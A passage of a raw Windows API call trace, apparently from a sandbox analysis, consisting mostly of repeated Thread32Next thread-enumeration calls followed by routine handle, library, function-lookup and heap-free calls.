lpte=0x14fe78) returned 1 [0221.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.751] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0222.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.215] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0223.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0225.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0226.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 0 [0226.126] CloseHandle (hObject=0x17c) returned 1 [0226.126] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0226.135] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0226.136] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0226.136] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0226.136] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0226.136] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0226.136] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5970f0 | out: hHeap=0x580000) returned 1 [0226.138] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x58b5c0 | out: hHeap=0x580000) returned 1 [0226.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, 